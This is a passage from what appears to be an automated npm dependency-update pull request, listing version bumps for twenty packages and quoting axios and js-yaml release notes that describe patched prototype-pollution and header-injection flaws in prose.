{"name":"on-headers","old_version":"1.0.2","new_version":"1.1.0","repository_url":"https://github.com/jshttp/on-headers"},{"name":"picomatch","old_version":"2.3.0","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"tar-fs","old_version":"2.0.1","new_version":"2.1.4","repository_url":"https://github.com/mafintosh/tar-fs"},{"name":"uuid","old_version":"8.3.2","new_version":"removed","repository_url":"https://github.com/uuidjs/uuid"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [axios](https://github.com/axios/axios) | `0.23.0` | `0.31.0` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [node-forge](https://github.com/digitalbazaar/forge) | `1.3.0` | `1.4.0` |\n| [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) | `7.14.2` | `7.29.0` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [@tootallnate/once](https://github.com/TooTallNate/once) | `1.1.2` | `removed` |\n| [body-parser](https://github.com/expressjs/body-parser) | `1.19.0` | `1.20.5` |\n| [express](https://github.com/expressjs/express) | `4.17.1` | `4.22.1` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.14` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.1.1` | `3.4.2` |\n| [got](https://github.com/sindresorhus/got) | `9.6.0` | `removed` |\n| [json5](https://github.com/json5/json5) | `1.0.1` | `1.0.2` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.18.1` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.0.4` | `3.1.5` |\n| [on-headers](https://github.com/jshttp/on-headers) | `1.0.2` | `1.1.0` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.0` | `2.3.2` |\n| [tar-fs](https://github.com/mafintosh/tar-fs) | `2.0.1` | `2.1.4` |\n| [uuid](https://github.com/uuidjs/uuid) | `8.3.2` | `removed` |\n\n\nUpdates `axios` from 0.23.0 to 0.31.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection \u0026amp; Proxy Bypass:\u003c/strong\u003e Backports v1 security hardening — sanitizes outgoing header values to strip invalid bytes, CRLF sequences, and boundary whitespace (including array values); adds proper \u003ccode\u003eNO_PROXY\u003c/code\u003e/\u003ccode\u003eno_proxy\u003c/code\u003e enforcement covering wildcards, explicit ports, loopback aliases (\u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, \u003ccode\u003e::1\u003c/code\u003e), bracketed IPv6, and trailing-dot hostnames. Proxy bypass is now checked before the proxy URL is parsed, and \u003ccode\u003eparsed.host\u003c/code\u003e is used for correct port and IPv6 handling. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10688\"\u003e#10688\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCI Security:\u003c/strong\u003e SHA-pins all actions and disables credential persistence in v0.x CI, introduces \u003ccode\u003ezizmor\u003c/code\u003e security scanning with SARIF upload to code scanning, adds an OIDC Trusted Publishing workflow with npm provenance attestations, and gates all publishes behind a required \u003ccode\u003enpm-publish\u003c/code\u003e GitHub Environment with configurable reviewer protections. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eTypeScript — \u003ccode\u003eAxiosInstance\u003c/code\u003e Return Types:\u003c/strong\u003e Fixes return types in \u003ccode\u003eAxiosInstance\u003c/code\u003e methods to correctly resolve to \u003ccode\u003ePromise\u0026lt;R\u0026gt;\u003c/code\u003e (matching \u003ccode\u003eAxiosPromise\u0026lt;T\u0026gt;\u003c/code\u003e semantics), and corrects the generic call signature so TypeScript properly enforces the response data type. TypeScript-only changes; no runtime impact. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7328\"\u003e#7328\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePerformance:\u003c/strong\u003e Fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e that caused excessive computation when the argument was a large string. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eVersioning \u0026amp; CI Workflow:\u003c/strong\u003e Adds an automated versioning flow for v0.x, renames the CI workflow for consistency with the v1.x naming convention, and corrects the branch name reference in CI config. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10690\"\u003e#10690\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10691\"\u003e#10691\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10692\"\u003e#10692\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/nakataki17\"\u003e\u003ccode\u003e@​nakataki17\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/gmasclet\"\u003e\u003ccode\u003e@​gmasclet\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/shaanmajid\"\u003e\u003ccode\u003e@​shaanmajid\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/ivan-churakov\"\u003e\u003ccode\u003e@​ivan-churakov\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7328\"\u003e#7328\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.30.3...v0.31.0\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eRelease notes - v0.30.3\u003c/h2\u003e\n\u003cp\u003eThis is a critical security maintenance release for the v0.x branch. It addresses a high-priority vulnerability involving prototype pollution that could lead to a Denial of Service (DoS).\u003c/p\u003e\n\u003cp\u003eRecommendation: All users currently on the 0.x release line should upgrade to this version immediately to ensure environment stability.\u003c/p\u003e\n\u003ch2\u003e🛡️ Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBackport: Fix DoS via \u003cstrong\u003eproto\u003c/strong\u003e key in merge config\u003c/strong\u003e\n\u003cul\u003e\n\u003cli\u003ePatched a vulnerability where specifically crafted configuration objects using the \u003cstrong\u003eproto\u003c/strong\u003e key could cause a Denial of Service during the merge process. - \u003cem\u003eby \u003ca href=\"https://github.com/FeBe95\"\u003e\u003ccode\u003e@​FeBe95\u003c/code\u003e\u003c/a\u003e in [PR \u003ca href=\"https://redirect.github.com/axios/axios/issues/7388\"\u003e#7388\u003c/a\u003e](\u003ca href=\"https://redirect.github.com/axios/axios/pull/7388\"\u003eaxios/axios#7388\u003c/a\u003e)\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e⚙️ Maintenance \u0026amp; CI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCI Infrastructure Update\u003c/strong\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated Continuous Integration workflows for the v0.x branch to maintain long-term support and build reliability. - \u003cem\u003eby \u003ca href=\"https://github.com/jasonsaayman\"\u003e\u003ccode\u003e@​jasonsaayman\u003c/code\u003e\u003c/a\u003e in [PR \u003ca href=\"https://redirect.github.com/axios/axios/issues/7407\"\u003e#7407\u003c/a\u003e](\u003ca href=\"https://redirect.github.com/axios/axios/pull/7407\"\u003eaxios/axios#7407\u003c/a\u003e)\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e⚠️ Breaking Changes\u003c/h2\u003e\n\u003cp\u003eConfiguration Merging Behavior:\u003c/p\u003e\n\u003cp\u003eAs part of the security fix, Axios now restricts the merging of the \u003cstrong\u003eproto\u003c/strong\u003e key within configuration objects. If your codebase relies on unconventional deep-merging patterns that target the object prototype via Axios config, those operations will now be blocked. This is a necessary change to prevent prototype pollution.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5073eca0edd37b13a0e39dcb48794d779b7dff8d\"\u003e\u003ccode\u003e5073eca\u003c/code\u003e\u003c/a\u003e chore: release v0.31.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10697\"\u003e#10697\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b57eb1a93214c9d6840035add0cc705fa9d6d697\"\u003e\u003ccode\u003eb57eb1a\u003c/code\u003e\u003c/a\u003e ci: update branch name (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10692\"\u003e#10692\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/00ab2af7334d75874605dcd22575673eae638cee\"\u003e\u003ccode\u003e00ab2af\u003c/code\u003e\u003c/a\u003e refactor: change name to have a unified workflow (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10691\"\u003e#10691\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9a66c090bfd946052afba365d809d0c4fbd13238\"\u003e\u003ccode\u003e9a66c09\u003c/code\u003e\u003c/a\u003e chore: added a versioning flow (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10690\"\u003e#10690\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c\"\u003e\u003ccode\u003e03cdfc9\u003c/code\u003e\u003c/a\u003e fix: backport the fixes from the v1 branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10688\"\u003e#10688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/71be4e5c80769329d7845b36a8d31e4f7f042202\"\u003e\u003ccode\u003e71be4e5\u003c/code\u003e\u003c/a\u003e fix: return types in AxiosInstance methods should be Promise\u0026lt;R\u0026gt; (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6253\"\u003e#6253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/62610f69ad140784ba8e4dc3c5ebec888b53682b\"\u003e\u003ccode\u003e62610f6\u003c/code\u003e\u003c/a\u003e fix: fixed performance issue in isEmptyObject() (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6484\"\u003e#6484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/68f97f7588608595c5251d91ce4c895e90a10ae0\"\u003e\u003ccode\u003e68f97f7\u003c/code\u003e\u003c/a\u003e ci: require npm-publish environment for releases (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10667\"\u003e#10667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/58a604385bf73c5ea19baa2e116de4c63c055852\"\u003e\u003ccode\u003e58a6043\u003c/code\u003e\u003c/a\u003e ci: add zizmor and harden v0.x CI (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10638\"\u003e#10638\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b560d41ab8e748d766bbd09bc90e6272f2cc535f\"\u003e\u003ccode\u003eb560d41\u003c/code\u003e\u003c/a\u003e ci: add OIDC publish workflow for v0.x (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10639\"\u003e#10639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v0.23.0...v0.31.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for axios since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of 